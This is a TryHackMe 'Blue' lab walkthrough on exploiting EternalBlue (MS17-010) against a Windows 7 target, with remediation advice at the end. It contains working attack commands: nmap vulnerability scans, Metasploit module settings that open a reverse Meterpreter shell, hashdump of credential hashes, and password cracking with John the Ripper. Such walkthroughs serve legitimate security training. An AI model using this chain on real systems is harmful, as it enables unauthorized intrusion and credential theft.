Share
## https://sploitus.com/exploit?id=66C876E9-6FE0-54C3-82A9-818A6802C4C9
[01-EternalBlue-MS17-010-README.md](https://github.com/user-attachments/files/27867170/01-EternalBlue-MS17-010-README.md)
# ๐ด EternalBlue Exploitation โ MS17-010 (CVE-2017-0143)
> Exploiting a critical Windows SMBv1 Remote Code Execution vulnerability using Nmap and Metasploit on TryHackMe's Blue room.





---
## ๐ Project Overview
| Field | Details |
|---|---|
| **Room** | TryHackMe โ Blue |
| **Target OS** | Windows 7 Professional SP1 (x64) |
| **Vulnerability** | MS17-010 EternalBlue โ SMBv1 RCE |
| **CVE** | CVE-2017-0143 |
| **CVSS Score** | 9.3 (Critical) |
| **Attacker OS** | Kali Linux 2025.1 |
| **Tools** | Nmap, Metasploit, John the Ripper |
---
## ๐ฏ Objective
Simulate a real-world attack scenario by identifying and exploiting the **EternalBlue (MS17-010)** vulnerability โ a critical SMBv1 Remote Code Execution flaw affecting unpatched Windows systems โ and demonstrate post-exploitation techniques including privilege escalation, credential dumping, and flag retrieval.
---
## ๐ง Concepts Covered
- โ
Network scanning & service enumeration with Nmap
- โ
SMB vulnerability detection using NSE scripts
- โ
CVE research using NIST National Vulnerability Database
- โ
Exploitation using Metasploit Framework (EternalBlue module)
- โ
Meterpreter shell โ post-exploitation commands
- โ
Credential hash dumping using `hashdump`
- โ
Password cracking using John the Ripper + rockyou.txt
- โ
Flag retrieval across filesystem locations
---
## ๐ ๏ธ Tools & Technologies






---
## ๐๏ธ Lab Architecture
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ LAB ENVIRONMENT โ
โ โ
โ ATTACKER (Kali Linux) TARGET (Windows 7 SP1) โ
โ โโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ IP: 192.168.217.209 IP: 10.49.130.67 โ
โ Metasploit Framework Port 445 โ SMBv1 OPEN โ
โ John the Ripper CVE-2017-0143 VULNERABLE โ
โ โ
โ Connection via: TryHackMe OpenVPN Tunnel โ
โ Tunnel IP: tun0 โ 192.168.217.209/17 โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
---
## ๐ Step-by-Step Walkthrough
### Phase 1 โ Environment Setup
**Connect to TryHackMe via OpenVPN:**
```bash
sudo openvpn [filename].ovpn
```
**Verify tunnel IP:**
```bash
ip a
# Look for tun0 interface โ this is your attack IP
```
---
### Phase 2 โ Reconnaissance & Scanning
**Full service scan on target:**
```bash
sudo nmap 10.49.130.67 -sV -sC -p- --min-rate 1000
```
**Results โ Open Ports Discovered:**
```
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional SP1
3389/tcp open ms-wbt-server Microsoft Terminal Service
Target: JON-PC | Domain: WORKGROUP
```
---
### Phase 3 โ Vulnerability Detection
**Run SMB vulnerability script:**
```bash
sudo nmap --script smb-vuln-ms17-010 --min-rate 1000 10.49.130.67
```
**Result:**
```
smb-vuln-ms17-010:
VULNERABLE:
Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
State: VULNERABLE
IDs: CVE:CVE-2017-0143
Risk factor: HIGH
```
> ๐ **CVE Research:** Verified on [NIST NVD](https://nvd.nist.gov/vuln/detail/cve-2017-0143) โ CVSS Base Score: 9.3 CRITICAL
---
### Phase 4 โ Exploitation (Metasploit)
**Launch Metasploit:**
```bash
msfconsole
```
**Search and select EternalBlue module:**
```bash
msf > search eternalblue
msf > use exploit/windows/smb/ms17_010_eternalblue
```
**Configure and run:**
```bash
set RHOSTS 10.49.130.67 # Target IP
set LHOST 192.168.217.209 # Your tun0 IP
exploit
```
**Result:**
```
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Meterpreter session 1 opened
meterpreter >
```
---
### Phase 5 โ Post-Exploitation
**Upgrade shell to Meterpreter:**
```bash
# Background current session
sessions
use post/multi/manage/shell_to_meterpreter
set SESSION 1
set LHOST 192.168.217.209
exploit
sessions 2
```
**System enumeration:**
```bash
meterpreter > sysinfo
# Computer: JON-PC | OS: Windows 7 SP1 | Arch: x64
meterpreter > shell
C:\Windows\system32> whoami
# nt authority\system โ Full SYSTEM privileges!
```
**Credential hash dumping:**
```bash
meterpreter > hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe...
# Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be...
```
**Password cracking:**
```bash
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Jon's password cracked successfully
```
---
### Phase 6 โ Flag Retrieval
```bash
# Flag 1 โ Root of C:\
cd c:\\ && dir
# flag1.txt found
# Flag 2 โ Windows System32 config
search -f flag2.txt
# c:\Windows\System32\config\flag2.txt
# Flag 3 โ User Documents
search -f flag3.txt
# c:\Users\Jon\Documents\flag3.txt
```
---
## ๐ Results Summary
| Phase | Action | Outcome |
|---|---|---|
| Recon | Nmap full scan | 4 open ports identified |
| Vuln Scan | smb-vuln-ms17-010 NSE | VULNERABLE confirmed |
| Exploitation | EternalBlue module | Meterpreter shell obtained |
| Privilege | whoami check | NT AUTHORITY\SYSTEM |
| Creds | hashdump | 3 hashes extracted |
| Cracking | John + rockyou | Password cracked |
| Flags | search -f | All 3 flags retrieved โ
|
---
## ๐ก๏ธ Remediation Recommendations
| Vulnerability | Fix |
|---|---|
| SMBv1 Enabled | Disable SMBv1 via PowerShell: `Set-SmbServerConfiguration -EnableSMB1Protocol $false` |
| MS17-010 Unpatched | Apply Microsoft Security Bulletin MS17-010 |
| Weak Passwords | Enforce password complexity policies |
| No Network Segmentation | Isolate SMB traffic with firewall rules โ block port 445 externally |
| No EDR/AV | Deploy endpoint detection to flag Metasploit payloads |
---
## ๐ Key Takeaways
1. **Unpatched SMBv1 is catastrophic** โ EternalBlue was used in WannaCry & NotPetya ransomware attacks
2. **Nmap NSE scripts** are powerful for rapid CVE-specific detection
3. **Always start with Report-Only scanning** before active exploitation in real engagements
4. **SYSTEM-level access** via a single exploit underscores the importance of network patching
5. **Password hygiene matters** โ weak NT hashes crack in seconds with rockyou.txt
---
## ๐ References
- [CVE-2017-0143 โ NVD NIST](https://nvd.nist.gov/vuln/detail/cve-2017-0143)
- [TryHackMe โ Blue Room](https://tryhackme.com/r/room/blue)
- [MS17-010 Microsoft Security Bulletin](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010)
- [Metasploit EternalBlue Module](https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/)
---
## ๐ค Author
**Badugu Gowtham Adhitya** | IAM Engineer & Cloud Security Engineer
[](https://www.linkedin.com/in/gowtham-adhitya-0a403b190)
[](https://github.com/gowthamadhitya)
> โ ๏ธ **Disclaimer:** This project was performed in a legal, controlled lab environment (TryHackMe). All techniques demonstrated are for educational purposes only.